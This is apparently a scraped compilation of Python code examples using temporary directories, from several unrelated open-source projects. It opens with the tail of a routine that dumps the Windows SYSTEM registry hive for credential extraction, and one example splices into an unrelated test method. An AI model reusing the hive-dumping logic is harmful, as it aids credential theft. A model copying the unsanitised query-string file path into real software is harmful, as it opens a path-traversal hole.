			logger.error('Failed to dump SYSTEM hive, exiting...')
			
		logger.debug('Cleaning up temp files')
		for reg_name, location in locations:
			try:
				os.remove(location)
			except Exception as e:
				logger.error('Failed to clean up temp file for %s! Sensitive files might have been left on the filesystem! Path: %s Reason: %s' % (reg_name, location, str(e)))
			else:
				logger.debug('Cleanup for %s OK!' % reg_name)
	
		return po
Example No. 50
 def __init__(self):
     rate_lock_path = (tempfile.gettempdir() +
                       "/m_rate.%s.lock" % HTTP_SOURCE_ADDR)
     # Ensure the rate lock file exists (...the easy way)
     open(rate_lock_path, "a").close()
     self._rate_lock = open(rate_lock_path, "r+")
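The constructor above only opens the lock file; presumably it is later locked around rate-limited operations. A minimal sketch of such usage on POSIX (the `fcntl`-based locking is an assumption, not code from the original project):

import fcntl

def _rate_limited(self, func, *args, **kwargs):
    # Serialize calls across processes via the lock file kept in the temp dir.
    fcntl.flock(self._rate_lock, fcntl.LOCK_EX)
    try:
        return func(*args, **kwargs)
    finally:
        fcntl.flock(self._rate_lock, fcntl.LOCK_UN)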
Example No. 51
def log_lockfile():
    tempdir = tempfile.gettempdir()
    uid = os.getuid()
    path = os.path.join(tempdir, ".ansible-lock.%s" % uid)
    return path
Example No. 52
def bootstrap(force=False, source=None):
    """
    Download and install the latest version of the Chocolatey package manager
    via the official bootstrap.

    Chocolatey requires Windows PowerShell and the .NET v4.0 runtime. Depending
    on the host's version of Windows, chocolatey.bootstrap will attempt to
    ensure these prerequisites are met by downloading and executing the
    appropriate installers from Microsoft.

    .. note::
        If PowerShell is installed, you may have to restart the host machine for
        Chocolatey to work.

    .. note::
        If you're installing offline using the source parameter, the PowerShell
        and .NET requirements must already be met on the target. This shouldn't
        be a problem on Windows versions 2012/8 and later

    Args:

        force (bool):
            Run the bootstrap process even if Chocolatey is found in the path.

        source (str):
            The location of the ``.nupkg`` file or ``.ps1`` file to run from an
            alternate location. This can be one of the following types of URLs:

            - salt://
            - http(s)://
            - ftp://
            - file:// - A local file on the system

            .. versionadded:: 3001

    Returns:
        str: The stdout of the Chocolatey installation script

    CLI Example:

    .. code-block:: bash

        # To bootstrap Chocolatey
        salt '*' chocolatey.bootstrap
        salt '*' chocolatey.bootstrap force=True

        # To bootstrap Chocolatey offline from a file on the salt master
        salt '*' chocolatey.bootstrap source=salt://files/chocolatey.nupkg

        # To bootstrap Chocolatey from a file on C:\\Temp
        salt '*' chocolatey.bootstrap source=C:\\Temp\\chocolatey.nupkg
    """
    # Check if Chocolatey is already present in the path
    try:
        choc_path = _find_chocolatey()
    except CommandExecutionError:
        choc_path = None
    if choc_path and not force:
        return "Chocolatey found at {0}".format(choc_path)

    temp_dir = tempfile.gettempdir()

    # Make sure PowerShell is on the System if we're passing source
    # Vista and Windows Server 2008 do not have Powershell installed
    powershell_info = __salt__["cmd.shell_info"](shell="powershell")
    if not powershell_info["installed"]:
        # The following lookup tables are required to determine the correct
        # download required to install PowerShell. That's right, there's more
        # than one! You're welcome.
        ps_downloads = {
            (
                "Vista",
                "x86",
            ): "http://download.microsoft.com/download/A/7/5/A75BC017-63CE-47D6-8FA4-AFB5C21BAC54/Windows6.0-KB968930-x86.msu",
            (
                "Vista",
                "AMD64",
            ): "http://download.microsoft.com/download/3/C/8/3C8CF51E-1D9D-4DAA-AAEA-5C48D1CD055C/Windows6.0-KB968930-x64.msu",
            (
                "2008Server",
                "x86",
            ): "http://download.microsoft.com/download/F/9/E/F9EF6ACB-2BA8-4845-9C10-85FC4A69B207/Windows6.0-KB968930-x86.msu",
            (
                "2008Server",
                "AMD64",
            ): "http://download.microsoft.com/download/2/8/6/28686477-3242-4E96-9009-30B16BED89AF/Windows6.0-KB968930-x64.msu",
        }

        # PowerShell needs to be installed on older systems (Vista, 2008Server)
        if (__grains__["osrelease"], __grains__["cpuarch"]) in ps_downloads:

            # Install the appropriate release of PowerShell v2.0
            url = ps_downloads[(__grains__["osrelease"], __grains__["cpuarch"])]
            dest = os.path.join(temp_dir, os.path.basename(url))
            # Download the KB
            try:
                log.debug("Downloading PowerShell...")
                __salt__["cp.get_url"](path=url, dest=dest)
            except MinionError:
                err = "Failed to download PowerShell KB for {0}" "".format(
                    __grains__["osrelease"]
                )
                if source:
                    raise CommandExecutionError(
                        "{0}: PowerShell is required to bootstrap Chocolatey "
                        "with Source".format(err)
                    )
                raise CommandExecutionError(err)
            # Install the KB
            cmd = [dest, "/quiet", "/norestart"]
            log.debug("Installing PowerShell...")
            result = __salt__["cmd.run_all"](cmd, python_shell=False)
            if result["retcode"] != 0:
                err = (
                    "Failed to install PowerShell KB. For more information "
                    "run the installer manually on the host"
                )
                raise CommandExecutionError(err)
        else:
            err = "Windows PowerShell Installation not available"
            raise CommandNotFoundError(err)

    # Check that .NET v4.0+ is installed
    # Windows 7 / Windows Server 2008 R2 and below do not come with at least
    # .NET v4.0 installed
    if not __utils__["dotnet.version_at_least"](version="4"):
        # It took until .NET v4.0 for Microsoft to get the hang of making
        # installers; this should work under any version of Windows
        url = "http://download.microsoft.com/download/1/B/E/1BE39E79-7E39-46A3-96FF-047F95396215/dotNetFx40_Full_setup.exe"
        dest = os.path.join(temp_dir, os.path.basename(url))
        # Download the .NET Framework 4 web installer
        try:
            log.debug("Downloading .NET v4.0...")
            __salt__["cp.get_url"](path=url, dest=dest)
        except MinionError:
            err = "Failed to download .NET v4.0 Web Installer"
            if source:
                err = (
                    "{0}: .NET v4.0+ is required to bootstrap "
                    "Chocolatey with Source".format(err)
                )
            raise CommandExecutionError(err)

        # Run the .NET Framework 4 web installer
        cmd = [dest, "/q", "/norestart"]
        log.debug("Installing .NET v4.0...")
        result = __salt__["cmd.run_all"](cmd, python_shell=False)
        if result["retcode"] != 0:
            err = (
                "Failed to install .NET v4.0 failed. For more information "
                "run the installer manually on the host"
            )
            raise CommandExecutionError(err)

    # Define target / destination
    if source:
        url = source
    else:
        url = "https://chocolatey.org/install.ps1"
    dest = os.path.join(temp_dir, os.path.basename(url))

    # Download Chocolatey installer
    try:
        log.debug("Downloading Chocolatey: {0}".format(os.path.basename(url)))
        script = __salt__["cp.get_url"](path=url, dest=dest)
        log.debug("Script: {0}".format(script))
    except MinionError:
        err = "Failed to download Chocolatey Installer"
        if source:
            err = "{0} from source"
        raise CommandExecutionError(err)

    # If this is a nupkg download we need to unzip it first
    if os.path.splitext(os.path.basename(dest))[1] == ".nupkg":
        log.debug("Unzipping Chocolatey: {0}".format(dest))
        __salt__["archive.unzip"](
            zip_file=dest,
            dest=os.path.join(os.path.dirname(dest), "chocolatey"),
            extract_perms=False,
        )
        script = os.path.join(
            os.path.dirname(dest), "chocolatey", "tools", "chocolateyInstall.ps1"
        )

    if not os.path.exists(script):
        raise CommandExecutionError(
            "Failed to find Chocolatey installation " "script: {0}".format(script)
        )

    # Run the Chocolatey bootstrap
    log.debug("Installing Chocolatey: {0}".format(script))
    result = __salt__["cmd.script"](
        script, cwd=os.path.dirname(script), shell="powershell", python_shell=True
    )
    if result["retcode"] != 0:
        err = "Bootstrapping Chocolatey failed: {0}".format(result["stderr"])
        raise CommandExecutionError(err)

    return result["stdout"]
Example No. 53
job.SetNotifyFlags(bits.BG_NOTIFY_JOB_TRANSFERRED | bits.BG_NOTIFY_JOB_ERROR
                   | bits.BG_NOTIFY_JOB_MODIFICATION)

# The idea here is to intentionally make one of the files fail to be
# downloaded. Then the JobError notification will be triggered, where
# we do fix the failing file by calling SetRemoteName to a valid URL
# and call Resume() on the job, making the job finish successfully.
#
# Note to self: A domain that cannot be resolved will cause
# TRANSIENT_ERROR instead of ERROR, and the JobError notification will
# not be triggered! This can bite you during testing depending on how
# your DNS is configured. For example, if you use OpenDNS.org's DNS
# servers, an invalid hostname will *always* be resolved (they
# redirect you to a search page), so be careful when testing.
job.AddFile('http://www.python.org/favicon.ico',
            os.path.join(tempfile.gettempdir(), 'bits-favicon.ico'))
job.AddFile('http://www.python.org/missing-favicon.ico',
            os.path.join(tempfile.gettempdir(), 'bits-missing-favicon.ico'))

for f in job.EnumFiles():
    print 'Downloading', f.GetRemoteName()
    print 'To', f.GetLocalName()

job.Resume()

while True:
    rc = win32event.MsgWaitForMultipleObjects((StopEvent, ), 0, TIMEOUT,
                                              win32event.QS_ALLEVENTS)

    if rc == win32event.WAIT_OBJECT_0:
        break
Example No. 54
import os
import sys
import tempfile

file = __file__.split(':/cygwin')[-1]
http_root = os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(file))))
sys.path.insert(0, http_root)

from resources.portabilityLayer import set_state, get_state
from urllib.parse import parse_qs

sys.stdout.write(
    'Content-Type: text/html\r\n'
    'Access-Control-Allow-Origin: *\r\n'
    'Access-Control-Allow-Headers: X-Custom-Header\r\n'
    'Access-Control-Max-Age: 0\r\n'
    '\r\n'
)

query = parse_qs(os.environ.get('QUERY_STRING', ''), keep_blank_values=True)
stateFile = os.path.join(tempfile.gettempdir(), query.get('filename', ['state.txt'])[0])

if os.environ.get('REQUEST_METHOD') == 'OPTIONS':
    if os.environ.get('HTTP_X_CUSTOM_HEADER'):
        set_state(stateFile, 'FAIL')
    else:
        set_state(stateFile, 'PASS')
else:
    if os.environ.get('HTTP_X_CUSTOM_HEADER'):
        sys.stdout.write(get_state(stateFile, default='FAIL'))
    else:
        sys.stdout.write('FAIL - no header in actual request')
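`set_state` and `get_state` are imported from the harness's `portabilityLayer` module, which is not shown here; a rough sketch of what such helpers might do (an assumption, not the actual WebKit implementation):

def set_state(state_file, value):
    # Persist a small piece of state for a later request to read back.
    with open(state_file, "w") as handle:
        handle.write(value)


def get_state(state_file, default=""):
    # Return the previously stored state, or the default if nothing was written.
    try:
        with open(state_file, "r") as handle:
            return handle.read()
    except IOError:
        return default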
Example No. 55
import os
import tempfile

import jinja2

from perfkitbenchmarker import context
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import log_util
from perfkitbenchmarker import regex_util

FLAGS = flags.FLAGS

PRIVATE_KEYFILE = 'perfkitbenchmarker_keyfile'
PUBLIC_KEYFILE = 'perfkitbenchmarker_keyfile.pub'
CERT_FILE = 'perfkitbenchmarker.pem'
TEMP_DIR = os.path.join(tempfile.gettempdir(), 'perfkitbenchmarker')

# The temporary directory on VMs. We cannot reuse GetTempDir()
# because run_uri will not be available at time of module load and we need
# to use this directory as a base for other module level constants.
VM_TMP_DIR = '/tmp/pkb'

# Default timeout for issuing a command.
DEFAULT_TIMEOUT = 300

# Defaults for retrying commands.
POLL_INTERVAL = 30
TIMEOUT = 1200
FUZZ = .5
MAX_RETRIES = -1
Example No. 56
def run():
    _path = os.getcwd()
    os.chdir(tempfile.gettempdir())
    print("------")
    print("os.name=%r" % (os.name))
    print("------")
    print("sys.platform=%r" % (sys.platform))
    print("------")
    print("sys.version:")
    print(sys.version)
    print("------")
    print("sys.prefix:")
    print(sys.prefix)
    print("------")
    print("sys.path=%r" % (":".join(sys.path)))
    print("------")

    try:
        import numpy

        has_newnumpy = 1
    except ImportError:
        print("Failed to import new numpy:", sys.exc_info()[1])
        has_newnumpy = 0

    try:
        from numpy.f2py import f2py2e

        has_f2py2e = 1
    except ImportError:
        print("Failed to import f2py2e:", sys.exc_info()[1])
        has_f2py2e = 0

    try:
        import numpy.distutils

        has_numpy_distutils = 2
    except ImportError:
        try:
            import numpy_distutils

            has_numpy_distutils = 1
        except ImportError:
            print("Failed to import numpy_distutils:", sys.exc_info()[1])
            has_numpy_distutils = 0

    if has_newnumpy:
        try:
            print(
                "Found new numpy version %r in %s" % (numpy.__version__, numpy.__file__)
            )
        except Exception as msg:
            print("error:", msg)
            print("------")

    if has_f2py2e:
        try:
            print(
                "Found f2py2e version %r in %s"
                % (f2py2e.__version__.version, f2py2e.__file__)
            )
        except Exception as msg:
            print("error:", msg)
            print("------")

    if has_numpy_distutils:
        try:
            if has_numpy_distutils == 2:
                print(
                    "Found numpy.distutils version %r in %r"
                    % (numpy.distutils.__version__, numpy.distutils.__file__)
                )
            else:
                print(
                    "Found numpy_distutils version %r in %r"
                    % (
                        numpy_distutils.numpy_distutils_version.numpy_distutils_version,
                        numpy_distutils.__file__,
                    )
                )
            print("------")
        except Exception as msg:
            print("error:", msg)
            print("------")
        try:
            if has_numpy_distutils == 1:
                print("Importing numpy_distutils.command.build_flib ...", end=" ")
                import numpy_distutils.command.build_flib as build_flib

                print("ok")
                print("------")
                try:
                    print("Checking availability of supported Fortran compilers:")
                    for compiler_class in build_flib.all_compilers:
                        compiler_class(verbose=1).is_available()
                        print("------")
                except Exception as msg:
                    print("error:", msg)
                    print("------")
        except Exception as msg:
            print(
                "error:",
                msg,
                "(ignore it, build_flib is obsolute for numpy.distutils 0.2.2 and up)",
            )
            print("------")
        try:
            if has_numpy_distutils == 2:
                print("Importing numpy.distutils.fcompiler ...", end=" ")
                import numpy.distutils.fcompiler as fcompiler
            else:
                print("Importing numpy_distutils.fcompiler ...", end=" ")
                import numpy_distutils.fcompiler as fcompiler
            print("ok")
            print("------")
            try:
                print("Checking availability of supported Fortran compilers:")
                fcompiler.show_fcompilers()
                print("------")
            except Exception as msg:
                print("error:", msg)
                print("------")
        except Exception as msg:
            print("error:", msg)
            print("------")
        try:
            if has_numpy_distutils == 2:
                print("Importing numpy.distutils.cpuinfo ...", end=" ")
                from numpy.distutils.cpuinfo import cpuinfo

                print("ok")
                print("------")
            else:
                try:
                    print("Importing numpy_distutils.command.cpuinfo ...", end=" ")
                    from numpy_distutils.command.cpuinfo import cpuinfo

                    print("ok")
                    print("------")
                except Exception as msg:
                    print("error:", msg, "(ignore it)")
                    print("Importing numpy_distutils.cpuinfo ...", end=" ")
                    from numpy_distutils.cpuinfo import cpuinfo

                    print("ok")
                    print("------")
            cpu = cpuinfo()
            print("CPU information:", end=" ")
            for name in dir(cpuinfo):
                if name[0] == "_" and name[1] != "_" and getattr(cpu, name[1:])():
                    print(name[1:], end=" ")
            print("------")
        except Exception as msg:
            print("error:", msg)
            print("------")
    os.chdir(_path)
Example No. 57
def launch_experiment(args, experiment_config, mode, config_file_name, experiment_id=None):
    '''follow steps to start rest server and start experiment'''
    nni_config = Config(config_file_name)
    # check packages for tuner
    package_name, module_name = None, None
    if experiment_config.get('tuner') and experiment_config['tuner'].get('builtinTunerName'):
        package_name = experiment_config['tuner']['builtinTunerName']
        module_name = ModuleName.get(package_name)
    elif experiment_config.get('advisor') and experiment_config['advisor'].get('builtinAdvisorName'):
        package_name = experiment_config['advisor']['builtinAdvisorName']
        module_name = AdvisorModuleName.get(package_name)
    if package_name and module_name:
        try:
            stdout_full_path, stderr_full_path = get_log_path(config_file_name)
            with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
                check_call([sys.executable, '-c', 'import %s'%(module_name)], stdout=stdout_file, stderr=stderr_file)
        except CalledProcessError:
            print_error('some errors happened when importing package %s.' % (package_name))
            print_log_content(config_file_name)
            if package_name in PACKAGE_REQUIREMENTS:
                print_error('If %s is not installed, it should be installed through '\
                            '\'nnictl package install --name %s\''%(package_name, package_name))
            exit(1)
    log_dir = experiment_config['logDir'] if experiment_config.get('logDir') else None
    log_level = experiment_config['logLevel'] if experiment_config.get('logLevel') else None
    #view experiment mode do not need debug function, when view an experiment, there will be no new logs created
    if mode != 'view':
        if log_level not in ['trace', 'debug'] and (args.debug or experiment_config.get('debug') is True):
            log_level = 'debug'
    # start rest server
    rest_process, start_time = start_rest_server(args.port, experiment_config['trainingServicePlatform'], \
                                                 mode, config_file_name, experiment_id, log_dir, log_level)
    nni_config.set_config('restServerPid', rest_process.pid)
    # Deal with annotation
    if experiment_config.get('useAnnotation'):
        path = os.path.join(tempfile.gettempdir(), get_user(), 'nni', 'annotation')
        if not os.path.isdir(path):
            os.makedirs(path)
        path = tempfile.mkdtemp(dir=path)
        nas_mode = experiment_config['trial'].get('nasMode', 'classic_mode')
        code_dir = expand_annotations(experiment_config['trial']['codeDir'], path, nas_mode=nas_mode)
        experiment_config['trial']['codeDir'] = code_dir
        search_space = generate_search_space(code_dir)
        experiment_config['searchSpace'] = json.dumps(search_space)
        assert search_space, ERROR_INFO % 'Generated search space is empty'
    elif experiment_config.get('searchSpacePath'):
        search_space = get_json_content(experiment_config.get('searchSpacePath'))
        experiment_config['searchSpace'] = json.dumps(search_space)
    else:
        experiment_config['searchSpace'] = json.dumps('')

    # check rest server
    running, _ = check_rest_server(args.port)
    if running:
        print_normal('Successfully started Restful server!')
    else:
        print_error('Restful server start failed!')
        print_log_content(config_file_name)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Rest server stopped!')
        exit(1)
    if mode != 'view':
        # set platform configuration
        set_platform_config(experiment_config['trainingServicePlatform'], experiment_config, args.port,\
                            config_file_name, rest_process)

    # start a new experiment
    print_normal('Starting experiment...')
    # set debug configuration
    if mode != 'view' and experiment_config.get('debug') is None:
        experiment_config['debug'] = args.debug
    response = set_experiment(experiment_config, mode, args.port, config_file_name)
    if response:
        if experiment_id is None:
            experiment_id = json.loads(response.text).get('experiment_id')
        nni_config.set_config('experimentId', experiment_id)
    else:
        print_error('Start experiment failed!')
        print_log_content(config_file_name)
        try:
            kill_command(rest_process.pid)
        except Exception:
            raise Exception(ERROR_INFO % 'Restful server stopped!')
        exit(1)
    if experiment_config.get('nniManagerIp'):
        web_ui_url_list = ['{0}:{1}'.format(experiment_config['nniManagerIp'], str(args.port))]
    else:
        web_ui_url_list = get_local_urls(args.port)
    nni_config.set_config('webuiUrl', web_ui_url_list)

    # save experiment information
    nnictl_experiment_config = Experiments()
    nnictl_experiment_config.add_experiment(experiment_id, args.port, start_time, config_file_name,
                                            experiment_config['trainingServicePlatform'],
                                            experiment_config['experimentName'])

    print_normal(EXPERIMENT_SUCCESS_INFO % (experiment_id, '   '.join(web_ui_url_list)))
Example No. 58
def main():
    ret = 0

    parser = argparse.ArgumentParser(description='project mirroring',
                                     parents=[get_baseparser(
                                         tool_version=__version__)
                                     ])

    parser.add_argument('project', nargs='*', default=None)
    parser.add_argument('-a', '--all', action='store_true',
                        help='mirror all indexed projects', default=False)
    parser.add_argument('-c', '--config',
                        help='config file in JSON/YAML format')
    parser.add_argument('-U', '--uri', default='http://localhost:8080/source',
                        help='uri of the webapp with context path')
    parser.add_argument('-b', '--batch', action='store_true',
                        help='batch mode - will log into a file')
    parser.add_argument('-B', '--backupcount', default=8,
                        help='how many log files to keep around in batch mode')
    parser.add_argument('-I', '--incoming', action='store_true',
                        help='Check for incoming changes, terminate the '
                             'processing if not found.')
    parser.add_argument('-w', '--workers', default=cpu_count(),
                        help='Number of worker processes')

    try:
        args = parser.parse_args()
    except ValueError as e:
        fatal(e)

    logger = get_console_logger(get_class_basename(), args.loglevel)

    if len(args.project) > 0 and args.all:
        fatal("Cannot use both project list and -a/--all")

    if not args.all and len(args.project) == 0:
        fatal("Need at least one project or --all")

    if args.config:
        config = read_config(logger, args.config)
        if config is None:
            fatal("Cannot read config file from {}".format(args.config))
    else:
        config = {}

    uri = args.uri
    if not is_web_uri(uri):
        fatal("Not a URI: {}".format(uri))
    logger.debug("web application URI = {}".format(uri))

    if not check_configuration(config):
        sys.exit(1)

    # Save the source root to avoid querying the web application.
    source_root = get_config_value(logger, 'sourceRoot', uri)
    if not source_root:
        sys.exit(1)

    logger.debug("Source root = {}".format(source_root))

    hookdir = config.get(HOOKDIR_PROPERTY)
    if hookdir:
        logger.debug("Hook directory = {}".format(hookdir))

    command_timeout = get_int(logger, "command timeout",
                              config.get(CMD_TIMEOUT_PROPERTY))
    if command_timeout:
        logger.debug("Global command timeout = {}".format(command_timeout))

    hook_timeout = get_int(logger, "hook timeout",
                           config.get(HOOK_TIMEOUT_PROPERTY))
    if hook_timeout:
        logger.debug("Global hook timeout = {}".format(hook_timeout))

    # Log messages to dedicated log file if running in batch mode.
    # (logdir stays None outside batch mode but is still passed to the workers.)
    logdir = None
    if args.batch:
        logdir = config.get(LOGDIR_PROPERTY)
        if not logdir:
            fatal("The {} property is required in batch mode".
                  format(LOGDIR_PROPERTY))

    projects = args.project
    if len(projects) == 1:
        lockfile = projects[0] + "-mirror"
    else:
        lockfile = os.path.basename(sys.argv[0])

    if args.all:
        projects = list_indexed_projects(logger, args.uri)

    lock = FileLock(os.path.join(tempfile.gettempdir(), lockfile + ".lock"))
    try:
        with lock.acquire(timeout=0):
            with Pool(processes=int(args.workers)) as pool:
                worker_args = []
                for x in projects:
                    worker_args.append([x, logdir, args.loglevel,
                                        args.backupcount, config,
                                        args.incoming,
                                        args.uri, source_root,
                                        args.batch])
                print(worker_args)
                try:
                    project_results = pool.map(worker, worker_args, 1)
                except KeyboardInterrupt:
                    sys.exit(1)
                else:
                    if any([True for x in project_results if x == 1]):
                        ret = 1
    except Timeout:
        logger.warning("Already running, exiting.")
        sys.exit(1)

    logging.shutdown()
    sys.exit(ret)
Example No. 59
import pathlib
import tempfile

from decouple import config

PROJECT_NAME = "shipit/api"
APP_NAME = "shipit_api"
SCOPE_PREFIX = f"project:releng:services/{APP_NAME}"

# A route key that triggers rebuild of product details.
# Worker will listen to this route key to trigger the rebuild.
PULSE_ROUTE_REBUILD_PRODUCT_DETAILS = "rebuild_product_details"

# A folder where we will keep a checkout of product details
PRODUCT_DETAILS_DIR = pathlib.Path(tempfile.gettempdir(), "product-details")
PRODUCT_DETAILS_NEW_DIR = pathlib.Path(tempfile.gettempdir(),
                                       "product-details-new")
PRODUCT_DETAILS_CACHE_DIR = pathlib.Path(tempfile.gettempdir(),
                                         "product-details-cache")

# Use CURRENT_ESR-1. Releases with major version equal or less than the
# breakpoint version will be served using static files. No related
# product-details data will be generated if we decide to ship a dot release
# with major version <= BREAKPOINT_VERSION. This includes Firefox (release,
# esr, beta, devedition, pinebuild), Fennec and Thunderbird.
BREAKPOINT_VERSION = 90

# When there is only one ESR release ESR_NEXT is set to '' and ESR_CURRENT is
# set to current ESR major version.  When we have 2 ESR releases, ESR_CURRENT
# should be using the major version of the older release, while ESR_NEXT should
# use the major version of the newer release.

    def run_once(self, opts=None):
        options = dict(
            filter='',
            test_names='',  # e.g., dEQP-GLES3.info.version,
            # dEQP-GLES2.functional,
            # dEQP-GLES3.accuracy.texture, etc.
            test_names_file='',
            timeout=self._timeout,
            subset_to_run='Pass',  # Pass, Fail, Timeout, NotPass...
            hasty='False',
            shard_number='0',
            shard_count='1',
            debug='False',
            perf_failure_description=None)
        if opts is None:
            opts = []
        options.update(utils.args_to_dict(opts))
        logging.info('Test Options: %s', options)

        self._hasty = (options['hasty'] == 'True')
        self._timeout = int(options['timeout'])
        self._test_names_file = options['test_names_file']
        self._test_names = options['test_names']
        self._shard_number = int(options['shard_number'])
        self._shard_count = int(options['shard_count'])
        self._debug = (options['debug'] == 'True')
        if not (self._test_names_file or self._test_names):
            self._filter = options['filter']
            if not self._filter:
                raise error.TestFail('Failed: No dEQP test filter specified')
        if options['perf_failure_description']:
            self._test_failure_description = options[
                'perf_failure_description']
        else:
            # Do not report failure if failure description is not specified.
            self._test_failure_report_enable = False

        # Some information to help post-process logs into blacklists later.
        logging.info('ChromeOS BOARD = %s', self._board)
        logging.info('ChromeOS CPU family = %s', self._cpu_type)
        logging.info('ChromeOS GPU family = %s', self._gpu_type)

        # Create a place to put detailed test output logs.
        filter_name = self._filter or os.path.basename(self._test_names_file)
        logging.info('dEQP test filter = %s', filter_name)
        self._log_path = os.path.join(tempfile.gettempdir(),
                                      '%s-logs' % filter_name)
        shutil.rmtree(self._log_path, ignore_errors=True)
        os.mkdir(self._log_path)

        # Load either tests specified by test_names_file, test_names or filter.
        test_cases = []
        if self._test_names_file:
            test_cases = self._get_test_cases_from_names_file()
        elif self._test_names:
            test_cases = []
            for name in self._test_names.split(','):
                test_cases.extend(self._get_test_cases(name, 'Pass'))
        elif self._filter:
            test_cases = self._get_test_cases(self._filter,
                                              options['subset_to_run'])

        if self._debug:
            # LogReader works on /var/log/messages by default.
            self._log_reader = cros_logging.LogReader()
            self._log_reader.set_start_by_current()

        # Assume all tests failed at the beginning.
        for test_case in test_cases:
            self.add_failures(test_case)

        test_results, failing_test = self._run_once(test_cases)
        # Rerun the test if we are in hasty mode.
        if self._hasty and len(failing_test) > 0:
            if len(failing_test) < sum(test_results.values()) * RERUN_RATIO:
                logging.info('Because we are in hasty mode, we will rerun the '
                             'failing tests one at a time')
                rerun_results, failing_test = self._run_once(failing_test)
                # Update failing test result from the test_results
                for result in test_results:
                    if result.lower() not in self.TEST_RESULT_FILTER:
                        test_results[result] = 0
                for result in rerun_results:
                    test_results[result] = (test_results.get(result, 0) +
                                            rerun_results[result])
            else:
                logging.info('There are too many failing tests. It would '
                             'take too long to rerun them. Giving up.')

        # Update failing tests to the chrome perf dashboard records.
        for test_case in test_cases:
            if test_case not in failing_test:
                self.remove_failures(test_case)

        logging.info('Test results:')
        logging.info(test_results)
        logging.debug('Test Failed: %s', failing_test)
        self.write_perf_keyval(test_results)

        test_count = 0
        test_failures = 0
        test_passes = 0
        test_skipped = 0
        for result in test_results:
            test_count += test_results[result]
            if result.lower() in ['pass']:
                test_passes += test_results[result]
            if result.lower() not in self.TEST_RESULT_FILTER:
                test_failures += test_results[result]
            if result.lower() in ['skipped']:
                test_skipped += test_results[result]
        # The text "Completed all tests." is used by the process_log.py script
        # and should always appear at the end of a completed test run.
        logging.info(
            'Completed all tests. Saw %d tests, %d passes and %d failures.',
            test_count, test_passes, test_failures)

        if self._filter and test_count == 0 and options[
                'subset_to_run'] != 'NotPass':
            logging.warning('No test cases found for filter: %s!',
                            self._filter)

        if test_failures:
            raise error.TestFail('Failed: on %s %d/%d tests failed.' %
                                 (self._gpu_type, test_failures, test_count))
        if test_skipped > 0:
            logging.info('On %s %d tests skipped, %d passes', self._gpu_type,
                         test_skipped, test_passes)